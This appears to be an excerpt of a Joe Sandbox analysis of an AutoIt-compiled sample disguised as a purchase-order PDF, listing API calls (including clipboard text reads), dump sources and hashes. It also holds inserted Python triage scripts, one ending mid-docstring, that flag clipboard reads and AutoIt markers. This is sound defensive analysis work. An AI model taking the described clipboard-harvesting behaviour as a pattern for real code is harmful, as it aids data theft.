• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1582027408-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b6bdd96bfb8dfd4a5be079cfa84d61e665241507efca00d9dbb6e1ee5a662276
                                                                                                                                                                                                                                                                                                            • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6bdd96bfb8dfd4a5be079cfa84d61e665241507efca00d9dbb6e1ee5a662276
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 589737431-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                                                                                                                                                                                            • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
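As an added example (not part of the Joe Sandbox report and not code from the sample), the following Python script parses an "APIs" listing in the format printed above and decodes the clipboard format identifiers, so an analyst can see at a glance that the routine at 0046C635 requests CF_UNICODETEXT (0xD), then CF_TEXT (0x1), and dereferences each handle with GlobalLock. The sample trace is copied from this page; the parsing regex, the detection rule and the names `parse_trace`, `clipboard_formats_read` and `summarize` are the editor's own. Because the listing is static and address-ordered, the error-path CloseClipboard calls interleave with the success path, so the rule pairs GetClipboardData with the next GlobalLock rather than resetting on CloseClipboard. Reading the clipboard is also done by benign GUI runtimes for ordinary paste handling, so treat the flag as a triage hint to correlate with the stealer verdict at the top of the report, not as evidence on its own.

```python
"""Decode a Joe Sandbox 'APIs' listing and flag clipboard-text reads.

Added example, not part of the report. The trace below is copied from the
listing on this page for the function at 0046C635; the detection rule is
the editor's own.
"""
import re

# Constructed sample input: the APIs listing of the clipboard routine as
# printed in this report (static, address-ordered, so error-path
# CloseClipboard calls sit between the success-path calls).
SAMPLE_TRACE = """\
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• GlobalLock.KERNEL32(00000000), ref: 0046C688
• CloseClipboard.USER32 ref: 0046C692
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• GlobalLock.KERNEL32(00000000), ref: 0046C6EE
• GlobalUnlock.KERNEL32(00000000), ref: 0046C726
• CloseClipboard.USER32 ref: 0046C866
"""

# Standard clipboard format identifiers from winuser.h.
CLIPBOARD_FORMATS = {
    0x01: "CF_TEXT",
    0x02: "CF_BITMAP",
    0x07: "CF_OEMTEXT",
    0x0D: "CF_UNICODETEXT",
    0x0F: "CF_HDROP",
}
TEXT_FORMATS = {0x01, 0x07, 0x0D}

# One listing line: "• Api.MODULE(arg,arg), ref: ADDR" or "• Api.MODULE ref: ADDR".
LINE_RE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<module>\w+)"      # OpenClipboard.USER32
    r"(?:\((?P<args>[^)]*)\))?"               # optional (arg,arg,...)
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"   # call-site address
)


def parse_arg(tok):
    """Hex literal -> int, '?' (unknown) -> None, anything else kept as text."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    if re.fullmatch(r"[0-9A-Fa-f]+", tok):
        return int(tok, 16)
    return tok


def parse_trace(text):
    """Return a list of {api, module, args, ref} dicts; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [parse_arg(a) for a in raw_args.split(",")] if raw_args is not None else []
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def clipboard_formats_read(calls):
    """Formats whose data handle is actually dereferenced (GetClipboardData + GlobalLock)."""
    requested, read = None, []
    for c in calls:
        if c["api"] == "GetClipboardData" and c["args"] and isinstance(c["args"][0], int):
            requested = c["args"][0]
        elif c["api"] == "GlobalLock" and requested is not None:
            read.append(requested)
            requested = None
    return read


def summarize(text):
    """Triage summary of one listing: which clipboard formats are checked and read."""
    calls = parse_trace(text)
    checked = [c["args"][0] for c in calls
               if c["api"] == "IsClipboardFormatAvailable" and c["args"] and isinstance(c["args"][0], int)]
    read = clipboard_formats_read(calls)
    name = lambda f: CLIPBOARD_FORMATS.get(f, f"0x{f:X}")
    return {
        "calls": len(calls),
        "formats_checked": [name(f) for f in checked],
        "formats_read": [name(f) for f in read],
        "reads_clipboard_text": any(f in TEXT_FORMATS for f in read),
        "first_ref": min((c["ref"] for c in calls), default=None),
        "last_ref": max((c["ref"] for c in calls), default=None),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_TRACE))
```

The same parser accepts the other listings on this page (tooltips, version-info) unchanged; only `clipboard_formats_read` is specific to the clipboard routine, and it returns an empty list for them.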
APIs
• GetCursorPos.USER32(?), ref: 00456692
• GetDesktopWindow.USER32 ref: 004566AA
• GetWindowRect.USER32(00000000), ref: 004566B1
• GetWindowLongW.USER32(?,000000F0), ref: 0045670D
• GetWindowLongW.USER32(?,000000F0), ref: 00456720
• DestroyWindow.USER32(?), ref: 00456731
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
• SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
• SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
• SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
• IsWindowVisible.USER32(?), ref: 00456812
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
• SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
• GetWindowRect.USER32(?,?), ref: 0045685C
• MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
• GetMonitorInfoW.USER32 ref: 00456894
• CopyRect.USER32(?,?), ref: 004568A8
• SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
• String ID: ($,$tooltips_class32
• API String ID: 541082891-3320066284
• Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
• Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
• Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
• Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
• _wcslen.LIBCMT ref: 00436B79
• _wcscpy.LIBCMT ref: 00436B9F
• _wcscat.LIBCMT ref: 00436BC0
• VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
• _wcscat.LIBCMT ref: 00436C2A
• _wcscat.LIBCMT ref: 00436C31
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00436C62
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1503153545-1459072770
• Opcode ID: b198237b3a557a0dc967365ee625912b8cab77bf067c40fb6a507f7203d4b4d1
• Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
• Opcode Fuzzy Hash: b198237b3a557a0dc967365ee625912b8cab77bf067c40fb6a507f7203d4b4d1
• Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
APIs
  • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
• _fseek.LIBCMT ref: 004527FC
• __wsplitpath.LIBCMT ref: 0045285C
• _wcscpy.LIBCMT ref: 00452871
• _wcscat.LIBCMT ref: 00452886
• __wsplitpath.LIBCMT ref: 004528B0
• _wcscat.LIBCMT ref: 004528C8
• _wcscat.LIBCMT ref: 004528DD
• __fread_nolock.LIBCMT ref: 00452914
• __fread_nolock.LIBCMT ref: 00452925
• __fread_nolock.LIBCMT ref: 00452944
• __fread_nolock.LIBCMT ref: 00452955
• __fread_nolock.LIBCMT ref: 00452976
• __fread_nolock.LIBCMT ref: 00452987
• __fread_nolock.LIBCMT ref: 00452998
• __fread_nolock.LIBCMT ref: 004529A9
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
• __fread_nolock.LIBCMT ref: 00452A39
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
• String ID:
• API String ID: 2054058615-0
• Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
• Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
• Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
• Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 48144b4d0158fb433444caf1f3151cb1eda9c25b5f4b776f29a215d65c12511a
• Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48144b4d0158fb433444caf1f3151cb1eda9c25b5f4b776f29a215d65c12511a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                            • API String ID: 867697134-248962490
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                                                                                                                                                                                                                                            • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 2353593579-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                                                                                                                                                                                            • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32 ref: 0044A11D
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                                                                                                                                                                                                            • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 0044A216
• GetSysColor.USER32(00000005), ref: 0044A21E
• GetWindowDC.USER32 ref: 0044A277
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
• GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
• GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
• GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
• ReleaseDC.USER32(?,00000000), ref: 0044A2D8
• SetTextColor.GDI32(00000000,?), ref: 0044A2F6
• SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
• GetStockObject.GDI32(00000005), ref: 0044A312
• SetBkColor.GDI32(00000000,00000000), ref: 0044A328
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
• String ID:
• API String ID: 1744303182-0
• Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
• Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
• Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
• Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
APIs
Strings
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 790654849-1810252412
• Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
• Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
• Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
• Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
Strings
Similarity
• API ID:
• String ID: >>>AUTOIT SCRIPT<<<$\
• API String ID: 0-1896584978
• Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
• Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
• Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
• Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
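Added example, not part of the Joe Sandbox report: a Python triage script built from the two string clusters the plugin lists above, the compiled-AutoIt marker >>>AUTOIT SCRIPT<<< in this function and the bracketed window-descriptor keywords ([ACTIVE, [ALL, [CLASS:, [HANDLE:, [LAST, [REGEXPTITLE:) from the __wcsicoll/__wcsnicmp function before it. It scans a raw dump for the marker in narrow and UTF-16LE form, pulls out the window descriptors, and maps each to the match mode the comparator selects, case-insensitively as __wcsnicmp does. The byte buffer and its offsets are constructed; only the single-property descriptor forms the report lists are handled, and searching both string encodings is a choice of the example, not something the report states.

```python
"""Triage checks built from two string clusters the Joe Sandbox IDA plugin
pulled out of the sample's code region (dump 00000000.00000002.2075597847,
base 0x400000): the compiled-AutoIt marker ">>>AUTOIT SCRIPT<<<" and the
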